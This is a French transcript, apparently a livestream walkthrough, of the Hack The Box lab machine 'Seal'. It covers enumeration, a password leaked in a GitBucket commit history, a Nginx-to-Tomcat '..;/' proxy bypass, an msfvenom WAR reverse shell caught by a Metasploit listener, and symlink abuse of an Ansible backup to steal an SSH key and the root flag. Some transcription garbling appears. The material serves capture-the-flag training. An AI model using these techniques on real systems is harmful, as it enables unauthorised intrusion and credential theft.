Seal, c'est une machine Linux de niveau médium. J'ai fait un scan Nmap, -P- pour dire de balayer tous les ports de 0 à 65 535, -T4 pour aller à une certaine vitesse assez élevée, -SV pour énumérer les versions, -SC pour utiliser script par défaut, suivi de l'adresse IP. Ici on voit le port 22, donc OpenSSH qui est sur une version relativement à jour. Donc pas de vulnérabilité sur ce service-là. La seule chose qu'on pourrait faire, c'est éventuellement, si jamais on a un mot de passe, voire une clé privée, de pouvoir s'authentifier dessus sur OpenSSH. Ici ensuite on a un port en HTTPS qui héberge un Nginx 1.18.0, c'est une Ubuntu qu'on a en face. On a un port 8080. Donc on va essayer de se connecter sur la page soit en HTTPS, soit HTTP sur le port 8080. Mais je vais, pour être sûr d'avoir tout ce qu'il faut, ajouter cet IP dans mon etc host. Donc vim etc host. Seal.htb, je le mets dans le etc host. Je l'avais vu ici, j'aurais pu le voir dans le certificat. Sinon, au pire, si vous l'avez pas bien vu, vous pouvez toujours faire un SSL scan sur le https ://l'IP. Il va nous permettre d'afficher des informations sur le TLS, le SSL TLS, si tous les niveaux de chiffrement sont corrects et tout. Et on peut voir les alt names comme ça. Seal.htb, donc on sait qu'on peut l'ajouter dans etc host. Ce qui m'intéresse du coup, c'est de faire ça, de me connecter sur seal.htb. Si jamais il y a des vhosts, on peut avoir un affichage de pages différents. Pour le premier, ça changera pas et le deuxième non plus a priori. Gobuster dire pour brute forcer tous les répertoires, -U suivi de l'URL. -K pour dire d'accepter le certificat s'il est auto-signé, -W pour utiliser une word list. On va utiliser celle-ci, même si elle m'avait fait faux bon la dernière fois. C'est pas bien grave, si jamais elle me refait faux bon, je la changerai. Je lance un autre GoBuster, dire en parallèle, -U, HTTP, suivi de l'URL, suivi d'un dictionnaire. Et il dit qu'il y a trop d'erreurs, on va s'arrêter là-dessus. Et l'autre, ça a l'air de marcher, il voit /images/admin/manager, voyons. Failed to connect, en fait il nous redirige vers le port 80 et ici on voit qu'il y a du Nginx et un Gitbucket. Donc on peut chercher sur internet s'il n'y a pas des vulnérabilités connues sur Gitbucket ou s'il n'y a pas des mots de passe par défaut, mais je vois qu'on peut créer un compte ici. Je vais juste créer un compte, je vais l'appeler Toto, mot de passe je vais mettre Toto et je crée un compte. Je pense que c'est créé, on va se connecter et j'ai pu m'authentifier. Première faille déjà, c'est pas normal de pouvoir permettre à n'importe qui de créer des comptes comme ça. Mais admettons qu'on puisse le faire, ce serait pas grave si on n'avait pas accès à certains projets. Et là je vois des projets d'un certain user qui s'appelle Root, donc c'est pas mal. Je vais regarder du coup les repositories auxquels j'ai accès. Ici je vois Seal Market, et ça ressemble beaucoup à ce site qui s'appelle Seal Market, qui est sur le HTTPS, et qui héberge une appli Nginx et Tomcat. On a vu qu'il y avait du Nginx, et on devine du coup que maintenant on sait qu'il y a du Tomcat. Je vais ouvrir Tomcat Users parce que c'est là-dedans qu'il y aurait des mots de passe de l'utilisateur Tomcat. Si on arrive à s'authentifier en tant qu'admin Tomcat, on devrait pouvoir éventuellement uploader un fichier au .war qui pourrait nous permettre d'avoir un reverse shell, puisqu'avec un .war on peut exécuter du code sur la cible. Donc finalement notre GoBuster sert plus ou moins à rien puisqu'on a a priori les dossiers du site web ici. Et on a un dossier admin dans lequel moi j'ai pas accès apparemment. Mais là, de là, on peut y avoir accès à au moins voir le code source. Mais ici, c'est du HTML, donc je verrai pas des mots de passe dedans, a priori. Et je vois rien de fou là-dedans. Tomcat Users, je vois username Tomcat, password égale must be changed, et en plus, c'est en commentaire. Et donc, on n'a pas fuité de mot de passe, ce qui est très dommage. Nginx plus Apache Tomcat ou Nginx plus Apache ou encore Nginx plus Jetty ou encore Nginx plus WebLogic ou Wildfly, ça peut porter à des vulnérabilités de type bypass de reverse proxy. Là on a un reverse proxy qui s'appelle Nginx. Il se peut que quand j'essaie d'accéder à /admin, si je mets / n'importe quoi, il me dit not found. Si je mets /toto, not found. Et si je mets /admin, il me dit pas not found, j'ai une erreur burp suite. En fait, je vais avoir normalement un forbidden. Donc je vais faire un curl pour voir ce que ça donne ici, avec un -K du coup pour accepter le certificat. On voit qu'il dit not found pour /toto, mais si je mets /admin, qu'est-ce qu'il me dit? Ah, il me dit rien. Maintenant, il me dit rien, mais j'ai pas affiché les headers -i. Voilà. Donc là, on a un HTTP 302 redirect qui nous redirige vers http://seal.htb/admin. Voilà, qui est redirigé là-dessus. Et quand on va essayer d'accéder là-dessus, ben, on n'aura accès à rien. Si je fais /manager, on voit qu'il y a du Tomcat et il nous redirige effectivement avec le serveur Nginx vers manager/html.
Donc j'essaie d'accéder à manager/html mais directement depuis le HTTPS parce que lui il me redirige vers un HTTP, pas S. Et si je fais ça, j'ai un forbidden. Donc si je vais sur la redirection, ça échoue. Et si je vais directement sur la bonne page d'admin, j'ai un forbidden. Je peux essayer une autre page autre que /html, je peux essayer /status. /status, c'est marrant parce que ça demande une authentification. Basic Realm Tomcat Application Manager. Donc voilà, on sait qu'on est sur du Tomcat. On pourrait s'authentifier sur /status, mais ça ne nous donne pas accès à un panel d'admin. Mais nous, ce qu'on aimerait, c'est s'authentifier sur /html. A priori, ici, on n'a rien. Mais il faut savoir que dans certains contextes, il est possible de bypasser les HTTP 403 Forbidden dans le cas où on a un Nginx qui est couplé avec une autre techno qui peut être soit Tomcat, JT, WebLogic, Wildfly ou encore Apache tout court. En gros, ce qu'on voit souvent, c'est Apache et Apache Tomcat et parfois un peu plus rarement JT et WebLogic et encore moins Wildfly. Et il y a des bypass qui vont être possibles parce que Nginx va traduire certaines requêtes HTTP et va envoyer ça au serveur web qui peut être Tomcat ou Apache Tomcat qui lui va interpréter ça un peu différemment. Par exemple, si on fait un get slash, Nginx va renvoyer get slash à Tomcat. Mais si on fait get slash point point slash point point slash, Nginx va le traduire et va envoyer à Tomcat get slash. Si jamais on fait un get slash images slash point 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 virgule slash admin, ou disons ici manager slash html, Nginx va le traduire en slash manager slash html. L'intérêt de faire ça, c'est que si on accède directement à slash manager slash html, le reverse proxy Nginx, il va voir qu'il y a un pépin parce qu'on accède à une page qui est interdite, et donc il va nous envoyer un forbidden, exactement ce qu'on a ici. Mais si on fait slash images slash point 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 virgule slash manager html, Nginx estime que c'est pas interdit de faire ça, puisque j'accède à slash images et des sous-dossiers de slash images. Donc il va le laisser passer. Mais juste après, il va faire une routine de traduction où il va dire on va dans le dossier images, puis on recule, parce que Nginx estime que point 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 virgule, ça veut dire point point slash. Et donc, il va le traduire en slash manager slash html. Donc, il y a un cas où si on accède à slash manager slash html, Nginx va nous envoyer un forbidden parce que c'est interdit et ne va jamais envoyer la demande auprès de Apache Tomcat. Et l'autre cas où Nginx va accepter cette requête, puis la traduire, puis l'envoyer à Apache Tomcat. Apache Tomcat, dès qu'il reçoit quelque chose, il va juste l'exécuter. Donc, ça veut dire qu'on va bypasser le proxy potentiellement, possiblement, puisque ça dépend de comment est configuré Nginx, mais si on envoie un get slash manager slash html, ça va nous afficher juste la page. Si jamais on repose sur la protection du fait que Nginx va bloquer la page en premier lieu, et donc qu'Apache Tomcat n'aura jamais la requête, ben ça passera pas. Ça, c'est ce que le développeur web se dira. Mais nous, on pourrait peut-être le bypasser. Tout dépend de comment est configuré le Nginx. En gros, il y a deux vulnes très connues. C'est de faire slash images slash point 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 virgule. Ou alors de faire get slash images slash point point slash manager slash html. On pourrait faire même point point virgule slash manager slash html. Ça, c'est un autre bypass, c'est pareil. Nginx va traduire ça en slash slash manager slash html. Et slash slash, c'est traduit par slash. Ensuite, on a get slash images slash point point slash manager.html. Donc là, c'est des idées de bypass qui ne marchent que dans certains cas de configuration. Mais à l'aveugle, on peut tenter ça, on peut tenter ça. On peut tenter ça. Les deux premiers, c'est pour abuser du mode d'interdiction de Nginx à accéder à certaines pages. Celui-là, c'est pour abuser de la mise en cache de certains dossiers. Par exemple, si on dit que le dossier images, tout ce qui est dedans est mis en cache et donc ça va être utilisé plus rapidement, ça fait que Nginx ne va pas interpréter les requêtes qui sont dans slash images, mais directement rediriger ça vers Apache Tomcat pour gagner en capacité de calcul en fait, pour traiter plus rapidement les choses. Donc si on va dans images et qu'on recule et qu'ensuite on va dans manager.html, on bypass du coup l'interdiction de Nginx. Le tout, c'est de pouvoir communiquer avec Apache Tomcat sans que Nginx ne se mêle de notre histoire. Parce que là, on a, je le rappelle, du Nginx plus Apache Tomcat.
Je crois qu'on est pas mal. Ouais, s'il y a une autre idée, c'est de faire un get. Mais ça marcherait sur Apache et non Apache Tomcat, il me semble. Apache couplé à Nginx. Je redis, ça c'est pour Apache Tomcat plus Nginx. Ça c'est pour Nginx plus Apache ou Apache Tomcat avec la mise en cache. Et ça, ce que je vais mettre, c'est que pour Apache simple plus Nginx. Donc ce serait un truc du genre get slash images point point slash manager slash html. Et aussi incroyable que ça puisse paraître, Nginx va traduire ça en slash images slash point point slash en gros. Il va traduire ça et comprendre qu'on va dans un dossier puis qu'on en recule. Donc il va traduire ça et envoyer cette demande là à Apache Tomcat. Et Apache Tomcat il va l'afficher volontiers, ce qui permettrait de bypasser éventuellement le reverse proxy. Donc je vais essayer la dernière technique. Je vais essayer le dernier là. Hop. Et ça marche pas. Je vais essayer l'avant-dernier. Hop. Et ça marche pas, mais c'est bizarre. On a un forbidden un peu différent. Et on va essayer le deuxième là. Et bim! Ça nous demande une authentification. Donc on a bypassé le reverse proxy. On a bypassé Nginx. Et on communique directement avec Apache Tomcat qui nous demande maintenant le mot de passe. Ça a fail. Ça a fail. Et ces deux vont réussir. Les deux premiers. Et je vous montre avec le premier comme quoi ça marche également. Ça marche aussi. Je peux essayer des mots de passe maintenant. Manager. Ça sera pas un mot de passe par défaut. Et donc on est coincé. La seule piste, c'est qu'on a accès à un Git bucket. Il n'y a pas de mot de passe ici dans ce fichier Tomcat Users, puisqu'ici on a password égale must be changed. Et ce qui est important de regarder maintenant, c'est que ici j'ai le latest commit du 6 mai de la part de Alex, qui a la référence DB85. Mais je vois ici qu'il y a 13 commits. Ce qui est important, c'est de regarder peut-être dedans. Je vais voir tous les commits et je vais voir tout ce qui a été fait. Vous voyez là, DB85, c'est le premier. Je peux faire Browse Files pour regarder les fichiers. Et on voit ce qu'il a dit, Updating Nginx Configuration. Il a mis à jour la configuration Nginx. Je peux regarder d'autres mises à jour, voir s'il n'y a pas des choses intéressantes. Mise à jour de la configuration Tomcat, ça peut m'intéresser. Peut-être qu'il avait mis des mots de passe dans le fichier de conf Tomcat, mais qu'après il l'avait enlevé. Donc je vais regarder, je vais l'ouvrir. Apache configuration, je vais l'ouvrir, Apache Tomcat. Je regarde ici, ils avaient dit qu'ils avaient mis à jour la configuration Tomcat. Donc je regarde, Tomcat Users, je regarde dedans. Et là, je vois quelque chose d'intéressant. Dans un vieux commit, ils avaient laissé le mot de passe en clair dans le fichier de conf. Donc je vais réessayer avec mon bypass Nginx de m'authentifier sur cette page. Ça me demande un username, je mets Tomcat. Et ça me demande un password, je mets celui qu'on a fuité. Et bim! On arrive à s'authentifier. Donc, c'était pas un mot de passe par défaut. C'était un mot de passe complexe. Et il était caché dans un vieux fichier de configuration qui avait été commit. Et ils l'ont retiré un jour en se disant que c'était pas safe de le display à tout le monde. Mais ils ont gardé le même mot de passe depuis l'époque. Donc, qui dit mot de passe compromis un jour, dit mot de passe compromis toujours. Donc, une fois qu'il est compromis un jour, il faut le changer. Ici, on a des infos sur ce site Akunetix, un article super bien fait. Et il y a un deuxième article super bien fait. En gros, c'est les deux articles les plus intéressants sur le bypass de reverse proxy que j'ai vu. Notamment OrangeSci, qui était connu parce qu'il avait fait pas mal de vulnes en tout genre. Il est pas mal connu, il est conférencier régulièrement. Parce qu'il trouve régulièrement des zero day et il avait fait cette conf à la Black Hat. Il avait signalé ça comme une zero day, mais finalement... Apache, Tomcat et Nginx ont dit que c'était pas une zero day mais une erreur de configuration et qu'ils laissaient ça comme ça. Et c'est ça qui est génial, c'est que même si vous avez des systèmes à jour, vous pouvez quand même vous exposer à ce genre de vulnérabilité. Toujours à tester quand on a un forbidden et qu'on sait qu'on a du Nginx plus du Tomcat ou qu'on se doute qu'il y a ça. Moi à l'aveugle je fais régulièrement ça. Quand j'ai un forbidden je me dis attends, c'est pas parce qu'il y a forbidden qu'on peut rien faire. Il y a ça, et il faudrait aussi tester les autres bypass de reverse proxy du style ajouter avec par exemple Burp Suite des headers, par exemple xRealIP 127.0.0.1 ou xForwarded4, puisque parfois les reverse proxy peuvent croire que si jamais on arrive depuis une IP qui s'appelle localhost, ben alors on peut whitelister certains trucs. Donc il y a tout un tas de headers, j'en ai compté 5 ou 6 je crois, qui sont compatibles avec certains reverse proxy. Donc il faut tous les mettre pour essayer ces bypass là. Ici on peut uploader normalement un .war. Donc je vais créer un fichier war qui va me permettre d'avoir un reverse shell.
Un point .war, c'est en gros une sorte de fichier PHP qu'on va ensuite interpréter juste en affichant la page. Et ce fichier PHP, on veut y mettre un reverse shell, comme ça on pourra compromettre directement le serveur. MSF Venom, reverse shell, war, on veut un format war. Et on cherche un payload qui fait du war. Et on copie-colle tout bêtement. C'est littéralement ce que je viens de taper. On va juste générer ce fichier war et je génère. Donc ici, voilà, j'ai créé un fichier qui s'appelle revshell.war qui est maintenant dangereux puisqu'il va me générer un reverse shell. Ça tombe bien, je suis sur Metasploit qui est lancé à côté. Je vais faire un use exploit multi-handler pour pouvoir récupérer le reverse shell. Cette payload, shell reverse TCP pour matcher exactement le même payload, sinon ça ne marchera pas. Je vais faire set lhost avec mon adresse IP, sinon ça ne marchera pas. Et set lport, je pense que le lport est déjà OK. Voyons les options. Voilà, mon local port est déjà à 4444. Donc c'est bon. Et donc je vais faire exploit. Et maintenant mon listener Metasploit est en attente d'un reverse shell que je vais essayer de déclencher en uploadant ce fichier war. On a pu faire ça, mais peut-être qu'on peut essayer de faire ça également. /manager /.virgule/html. Peut-être ce payload marcherait mieux. Voilà, il marche pour s'authentifier, normal. Et on essaie de deploy avec ça. Et j'intercepte avec Burp Suite et on va voir. Ah, là il fait un post vers le mauvais chemin. .virgule/. Et peut-être que là... Ah, ça a marché. Donc l'idée c'était de faire ce payload là. On peut se donner un reverse shell. Maintenant qu'on a réussi à uploader le rev shell, on le voit ici. Je peux maintenant accéder à /revshell/ et normalement ça va trigger. Je fais forward là. Voilà, ça a lancé. Et normalement ça devrait trigger mon Metasploit. Voyons. Et on voit que Metasploit a été trigger. On voit qu'on a un shell. Alors on peut regarder s'il y a Python. Il n'y a pas l'air. S'il y a Python 3, il y a donc Python 3-c import pty, .pty.spawn /bin/bash. Et on arrive à avoir un shell tty. Je vais uploader linpeas. Donc home kali tools linpeas, qui est un script d'énumération et d'audit de configuration locale. Je vais l'uploader avec un petit serveur web basique que je vais monter avec Python. Donc http.server80, je le upload. Depuis mon reverse shell, je vais aller dans /tmp parce que j'ai les droits en écriture en général dessus. Je vais faire un wget de http://monip/linpeas.sh. ls, il est ici. Je vais faire un chmod plus x de linpeas.sh et je vais le lancer. linpeas.sh. On lance le haricot et on regarde ce que ça trouve. Alors on regarde un petit peu le linpeas. On voit rien a priori d'intéressant pour l'instant. Ok. Ok. Ok, searching uncommon passwords. Bind files, rien d'intéressant ici. Ce qui va nous intéresser, je crois qu'on y est bientôt. Les SUID, il n'y a rien de fou. SGID, rien de fou. Et là, on a les capabilities pour binder un port. Ok. Ok, on a des capabilities, mais pas si folles. Voilà. Les fichiers intéressants qui ont été modifiés dans les 5 dernières minutes. On voit qu'il y a /opt backups, /archives, /backups. On voit qu'il y a une backup qui a l'air d'être faite toutes les minutes ici. Donc c'est intéressant. Je vais essayer d'aller dans /opt pour voir ce qu'il y a là-dedans. On voit qu'il y a le dossier backups. Dans backup, on a un dossier qui s'appelle archive, ls. Et ici, on voit la dernière archive. Je vais aller dans playbook qui était juste avant. ls, il y a un fichier run.yml. 4 run.yml. Ça fait une synchronisation, donc ça backup le dossier /var/lib /tomcat9 /admin /dashboard. Donc en gros, c'est un script Ansible qui fait des backups. Et ce qui est intéressant, c'est qu'il y a un copy links égale yes. Donc ça copie également les liens symboliques. Ce dossier-là, je vais faire un cd de ça, ls. Et je vois qu'il y a plein de fichiers, plein de dossiers, /uploads et tout. Si je fais un ls-al de ce dossier /run.yml, le script là, qui est exécuté par Louis toutes les minutes, on n'a pas le droit de le modifier, mais il fait un backup toutes les minutes, tout en récupérant les liens symboliques qu'il peut résoudre. Ça veut dire que si j'ai les droits en écriture dans un de ces dossiers qui sont backupés, je devrais pouvoir écrire un lien symbolique vers un fichier sensible qui a le droit d'accéder Louis, mais pas moi en tant que page Tomcat, et qui permettrait de fuiter quelque chose.
Merci Chivers et merci Florian pour ton follow. Et merci Kirom, bienvenue à vous. Donc ce que je vais faire un find point dans le dossier courant. Vous savez, dans le dossier slash dashboard, celui qui est backupé. Et je vais faire un tiret writable. Et je vais rediriger les erreurs dans devnull si jamais il y en a. Et on voit qu'il y a le dossier ./uploads qui est writable. Donc je vais faire un ls-alt sinon. Et on voit que j'ai le droit d'écriture dans /uploads. Vous voyez, il y a rwx dans /uploads. Alors que tous les autres, j'ai pas w, j'ai pas write. Donc si je vais dans /uploads et ls, ici je peux faire ce que je veux. Je peux créer des fichiers comme je veux. Et ils vont être backupés par Louis avec les résolutions de liens symboliques. Donc je vais effectivement prendre la SSH private key de Louis. J'arrive à créer le lien symbolique. Voilà. Pour preuve, je vais dans le dossier /uploads. Donc j'ai bien créé mes fichiers, catuser.txt. Je peux évidemment pas y accéder. Permission denied. Mais s'il y a un backup qui est fait dans la minute, c'est parti. J'ai pu récupérer un fichier ls. J'ai pu récupérer le fichier backup. Je vais le dézipper. Donc c'est tar-xvf, je crois. Ou non, gunzip, gzip. gzip-h, e pour extract, -d pour décompresse, donc gzip-d backup.gz, ls, et là ça nous donne un fichier qui s'appelle backup. Est-ce que c'est un fichier ou un dossier en fait? C'est plutôt un non, c'est un fichier. File backup, je vais faire file backup. C'est une archive POSIX star, donc je vais faire tar-xvf de backup pour le décompresser, ls, et ça nous a décompressé tout un tas de choses dans dashboard, ls, et nous on va aller du coup dans uploads, ls, et on a les fichiers user.txt et id RSA, la clé privée quoi. Donc je vais faire un chmod 600 de la clé privée pour pouvoir me connecter avec la clé privée en tant que Louis. Donc je vais faire un ssh louis@pil.htb-i pour préciser la clé privée, id RSA. J'arrive à m'authentifier en tant que Louis. Donc maintenant je fais un sudo-l pour voir un petit peu ce que j'ai. Bon, première chose que je fais, c'est ID. Ensuite, je fais un sudo-l. Ensuite, je peux essayer de chercher des SUID. Et ensuite, en général, je regarde peut-être dans /opt ou dans les home des users. Mais en général, je m'arrête là et j'essaie de voir plutôt à coup de linpiz si j'ai pas trouvé plus de choses. J'ai le droit de faire sudo, donc d'exécuter en tant que root à l'aide de la commande sudo, sans demander le mot de passe du user courant ou de root. Pour info, je ne connais pas le mot de passe du user courant puisque je l'ai bypassé grâce à la clé privée. Puisque je ne le connaissais pas. Tous les mots de passe que j'avais pu fuiter précédemment ne fonctionnaient pas. J'avais un access denied si je les utilisais. Et je peux utiliser cette commande-là. Donc je vais essayer ça, sudo de cette commande-là. Et on a un help. Donc je fais -h pour voir un peu comment ça marche. Et en fait, je vois que c'est un outil Ansible pour run des playbooks Ansible. Et justement, on avait un fichier .yaml tout à l'heure qui était au format Ansible. Usage, c'est Ansible-playbook. Ensuite, on met des paramètres si on veut, suivi du fichier de playbook. Qu'est-ce qui se passe si je fais ça, mais que je run le fichier run.yaml? Ça veut dire que j'exécute une backup à l'aide du script run.yaml, mais en tant que root. Est-ce que je peux pas réutiliser la même vulnérabilité que tout à l'heure et faire un lien symbolique de /root/root.txt de la même manière que je pourrais peut-être faire un lien symbolique de /root/.ssh/id-rsa vers du coup id-rsa et l'autre serait vers root.txt. Est-ce que je pourrais pas faire un lien symbolique comme ça et ensuite lancer un backup en tant que root, ce qui permettrait d'éviter d'avoir un access denied? Voyons maintenant la même commande que juste au-dessus, un sudo, et je lance les backups à un failed. Voyons, ls. Ah oui, ils ont été enlevés. Donc ce que je vais faire les liens symboliques du flag root.txt, point virgule de id-rsa, point virgule dans la même commande, hein. Je le fais très rapidement en fait pour être sûr que le script soit pas supprimé. Je pense qu'il est supprimé régulièrement pour pas que les challengers soient spoilés. Suivi du sudo pour générer la backup et ensuite je ferai ça. Voilà, et je mettrai le nom du fichier, backup.gz. Ouais, c'est à cause du delay. Je dois attendre un peu alors. Parce qu'il doit faire une backup toutes les minutes normalement. Ah, là c'est passé. Là j'ai une archive qui est à peu près récente a priori. Je vais le récupérer. Et c'est parti. Oula, j'ai oublié de rediriger dans un fichier. C'est parti. Voilà, je l'ai récupéré. On va faire... c'est parti, on décompresse. Archive, ls.
Starter XVF de Archive 3. ELS, c'est des dashboards uploads ELS. Voilà. Il n'y a pas le fichier IDRSA, donc il n'y a pas de clé privée, mais il y a bien le fichier root.txt. Et il n'est pas vide, donc c'est le flag.